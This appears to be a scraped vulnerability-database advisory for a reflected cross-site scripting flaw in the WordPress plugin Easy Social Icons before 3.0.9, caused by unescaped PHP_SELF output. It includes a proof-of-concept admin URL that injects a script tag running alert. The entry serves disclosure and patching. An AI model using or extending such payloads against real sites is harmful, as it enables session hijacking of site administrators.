Lucene search

K
wpexploitWpvulndbWPEX-ID:5E0BF0B6-9809-426B-B1D4-1FB653083B58
HistoryAug 30, 2021 - 12:00 a.m.

Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting

2021-08-3000:00:00
wpvulndb
104

0.003 Low

EPSS

Percentile

65.9%

The plugin does not escape the $_SERVER[‘PHP_SELF’] input before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

https://example.com/wp-admin/admin.php/</script><script>alert(/XSS/)</script>/?page=cnss_social_icon_page

0.003 Low

EPSS

Percentile

65.9%

Related for WPEX-ID:5E0BF0B6-9809-426B-B1D4-1FB653083B58